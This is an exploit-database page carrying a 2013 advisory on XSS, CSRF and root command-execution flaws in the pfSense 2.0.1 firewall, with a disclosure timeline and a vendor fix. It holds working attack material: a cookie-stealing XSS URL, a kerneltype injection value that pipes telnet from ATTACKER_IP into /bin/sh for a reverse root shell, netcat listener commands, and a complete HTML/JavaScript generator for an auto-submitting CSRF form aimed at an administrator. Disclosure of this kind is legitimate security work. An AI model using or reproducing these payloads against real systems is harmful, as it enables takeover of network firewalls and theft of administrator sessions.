Menu

Search for hundreds of thousands of exploits

"pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution"

Author

Exploit author

"Yann CAM"

Platform

Exploit platform

php

Release date

Exploit published date

2013-01-05

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
######################################################################
# Exploit Title: pfSense 2.0.1 XSS & CSRF Remote root Access
# Date: 04/01/2013
# Author: Yann CAM @ Synetis
# Vendor or Software Link: www.pfsense.org
# Version: 2.0.1
# Category: XSS & CSRF Remote root Access
# Google dork:
# Tested on: FreeBSD
######################################################################



pfSense firewall/router distribution description :
======================================================================

pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations protecting thousands of network devices. 

This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however it is not our primary focus.

In version 2.0.1 of the distribution, differents vulnerabilities XSS & CSRF RCE reverse root shell can be used. It is strongly advised to update to version 2.0.2 available now.



Proof of Concept 1 :
======================================================================

Potential XSS protected with CSRFMagic with information disclosure :

File /usr/local/www/progress.php lines 21-30 :
  $X = upload_progress_meter_get_info( $_GET["UPLOAD_IDENTIFIER"] );
  if (!$X) {
 
    if ( array_key_exists( "e", $_GET ) ) {
       echo "<HTML><BODY onLoad='window.close();'>" . gettext("Invalid Meter ID") . "! {$_GET["UPLOAD_IDENTIFIER"]}";
       echo ('</BODY></HTML>');
     }else{
       echo ('<HTML><meta HTTP-EQUIV="Refresh" CONTENT="1; url='. $url .'"><BODY></BODY></HTML>');
     }
     exit;

Result with a direct call to this page :

Fatal error: Call to undefined function upload_progress_meter_get_info() in /usr/local/www/progress.php on line 21



Proof of Concept 2 :
======================================================================

XSS non-persistent :

File /usr/local/www/pkg_mgr_install.php line 166 :
      update_output_window(sprintf(gettext("Could not find %s."), $_GET['pkg']));

PoC :
  http://pfsense_url/pkg_mgr_install.php?mode=installedinfo&pkg=x%22;alert(document.cookie);this.document.forms[0].output.value+=%22



Proof of Concept 3 :
======================================================================

CSRF exploit to Remote Command Execution in root context :

File /usr/local/www/system_firware.php line 118 (because this script isn't protected with CSRFMagic) :
  if($_POST['kerneltype']) {
     if($_POST['kerneltype'] == "single")
       system("touch /boot/kernel/pfsense_kernel.txt");
     else
       system("echo {$_POST['kerneltype']} > /boot/kernel/pfsense_kernel.txt"); // vulnerability here
  }

It's the more dangerous vulnerability. By this way, it's possible to an attacker to gain a full interactive reverse shell through a CSRF attack.

Default valid command :
  echo SMP > /boot/kernel/pfsense_kernel.txt

Forged $_POST['kerneltype'] variable for RCE command to generate :
  SMP > /boot/kernel/pfsense_kernel.txt;telnet ATTACKER_IP 1337 | /bin/sh | telnet ATTACKER_IP 1338

Attacker need to put two netcat in listen mode on his computer :
  nc -l -vv -p 1337 # to send command
  nc -l -vv -p 1338 # to read results

You can see this exploitation in this demonstration video just made as proof of concept here:
  http://www.youtube.com/watch?feature=player_embedded&v=qnmalMrrUF4

CSRF generator to Reverse root shell :

<html>
  <head>
    <script>
function trim(s){
  return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,'');
}
 
function generateCSRF(){
  var target = trim(document.getElementById("target").value);
  var attacker = trim(document.getElementById("attacker").value);
  var sendport = trim(document.getElementById("sendport").value);
   var readport = trim(document.getElementById("readport").value);
  var resultjs = "";
  resultjs += "<html><body><form name='x' action='" + target + "system_firmware.php' method='post'>";
  resultjs += "<input type='hidden' name='kerneltype' value='SMP > /boot/kernel/pfsense_kernel.txt;telnet " + attacker + " " + sendport + " | /bin/sh | telnet " + attacker + " " + readport + "' />";
  resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>";
  document.getElementById("resultjs").value = resultjs;
}
 
    </script>
  </head>
   <body onload="generateCSRF();">
     <h2>CSRF pfSense 2.0.1 to root RCE (reverse shell)</h2>
     <p>pfSense 2.0.1, the latest firewall/router distribution based on FreeBSD is vulnerable to a CSRF attack that allows gaining root access through a reverse shell.<br />
 The attacker must know the URL address of pfsense WebGui.<br />
 To obtain the reverseshell, attacker must place two netcat in listening mode on two different ports. One will be used to send commands and the other for receiving results.<br />
 On attacker machine :
       <pre>nc -l -vv -p 1337 # First netcat listener, to enter shell command.</pre>
       <pre>nc -l -vv -p 1338 # Second netcat listener, to receive commands results.</pre>
 (admin hash is in the /config/config.xml file on pfSense)
     </p>
 <form action="" onsubmit="generateCSRF();return false;">
   <table>
     <tr><td>URL's pfSense 2.0.1 Targeted :</td> <td>
       <input id="target" type="text" value="http://192.168.0.254:80/" size="70" onkeyup="generateCSRF();" /></td>
     </tr>
     <tr><td>Attacker IP (reverse shell) :</td> <td>
       <input id="attacker" type="text" value="192.168.0.141" size="70" onkeyup="generateCSRF();" /></td>
     </tr>
     <tr><td>Attacker binded port to send commands :</td> <td>
       <input id="sendport" type="text" value="1337" size="70" onkeyup="generateCSRF();" /></td>
     </tr>
     <tr><td>Attacker binded port to read results :</td> <td>
       <input id="readport" type="text" value="1338" size="70" onkeyup="generateCSRF();" /></td>
     </tr>
 
    <tr> <td>CSRF exploit to send to an admin : </td> <td>
      <textarea cols="70" rows="10" id="resultjs" readonly="readonly">&lt;/textarea&gt; </td>
     </tr>
   </table>
 </form>
 </body>
</html>


Solution:
======================================================================
2012-12-21:  Release 2.0.2




Additional resources :
======================================================================

- www.pfsense.org
- www.synetis.com
- www.synetis.com/2012/11/12/contribution-au-pare-feu-routeur-pfsense
- www.asafety.fr/vuln-exploit-poc/xss-csrf-rce-pfsense-2-0-1-remote-root-access
- www.youtube.com/watch?feature=player_embedded&v=qnmalMrrUF4
- github.com/bsdperimeter/pfsense/commit/73b9d3c60a337ab0fe979958990a717288844ddd
- github.com/bsdperimeter/pfsense/commit/33ba41314b5e78c16562365826aef9118f370e46



Report timeline :
======================================================================

2012-10-02 : Team alerted with many details, PoC, video and potential solution
2012-10-04 : Team response with correction links into git repository
2012-10-05 : Our feedback concerning their corrections
2012-12-10 : Answer about the next release date of the 2.0.2 (no response)
2012-12-21 : Release 2.0.2
2013-01-04 : Public advisory



Credits :
======================================================================

    88888888
   88      888                                         88    88
  888       88                                         88
  788           Z88      88  88.888888     8888888   888888  88    8888888.
   888888.       88     88   888    Z88   88     88    88    88   88     88
       8888888    88    88   88      88  88       88   88    88   888
            888   88   88    88      88  88888888888   88    88     888888
  88         88    88  8.    88      88  88            88    88          888
  888       ,88     8I88     88      88   88      88   88    88  .88     .88
   ?8888888888.     888      88      88    88888888    8888  88   =88888888
       888.          88
                    88    www.synetis.com
                 8888  Consulting firm in management and information security

Yann CAM - Security Consultant @ synetis



Last word :
======================================================================

Thank you to all the pfSense team for professionalism and quality solution despite of these few minor weaknesses.

-- 
SYNETIS
CONTACT: www.synetis.com
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2017-03-03 "pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php "Yann CAM"
2016-05-04 "IPFire < 2.19 Core Update 101 - Remote Command Execution" webapps cgi "Yann CAM"
2013-09-25 "ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure" webapps linux "Yann CAM"
2013-01-05 "pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution" webapps php "Yann CAM"
2012-12-07 "m0n0wall 1.33 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps freebsd "Yann CAM" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected